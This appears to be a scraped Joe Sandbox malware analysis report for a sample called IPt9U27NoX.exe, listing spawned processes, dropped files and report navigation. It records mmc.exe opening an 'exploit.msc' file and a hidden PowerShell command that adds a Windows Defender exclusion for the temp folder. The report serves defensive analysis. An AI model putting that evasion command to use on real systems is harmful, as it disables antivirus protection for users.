Start date:	13/03/2025
Path:	C:\Windows\System32\mmc.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\system32\mmc.exe" "C:\Users\user\AppData\Local\Temp\RarSFX0\exploit.msc"
Imagebase:	0x7ff782160000
File size:	1'953'280 bytes
MD5 hash:	58C9E5172C3708A6971CA0CBC80FE8B8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	false

Show Windows behavior

Target ID:	3
Start time:	05:48:46
Start date:	13/03/2025
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -WindowStyle Hidden -Command & {Add-MpPreference -ExclusionPath $env:TEMP}
Imagebase:	0x7ff7d9540000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	05:48:46
Start date:	13/03/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff650920000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	05:48:49
Start date:	13/03/2025
Path:	C:\Windows\System32\wbem\WmiPrvSE.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Imagebase:	0x7ff7df620000
File size:	496'640 bytes
MD5 hash:	60FF40CFD7FB8FE41EE4FE9AE5FE1C51
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	05:48:51
Start date:	13/03/2025
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Imagebase:	0x7ff62e4c0000
File size:	55'320 bytes
MD5 hash:	B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Chronological Activities

Disassembly

Reset < >

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report IPt9U27NoX.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\Microsoft\Network\Downloader\edb.log

C:\ProgramData\Microsoft\Network\Downloader\qmgr.db

C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9H3TYFD3\brave[1].htm

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

C:\Users\user\AppData\Local\Temp\RarSFX0\exploit.msc

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1cj4i1hq.rfz.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mkqm54w2.olb.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_oxor1bv1.cs5.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wgnkzgoa.5aj.psm1

C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms (copy)

C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\Z8X8HZSNH9UN9F2HCMUU.temp

C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp

Static File Info

General

File Icon

Static PE Info

General

Authenticode Signature

Entrypoint Preview

Windows Analysis Report
IPt9U27NoX.exe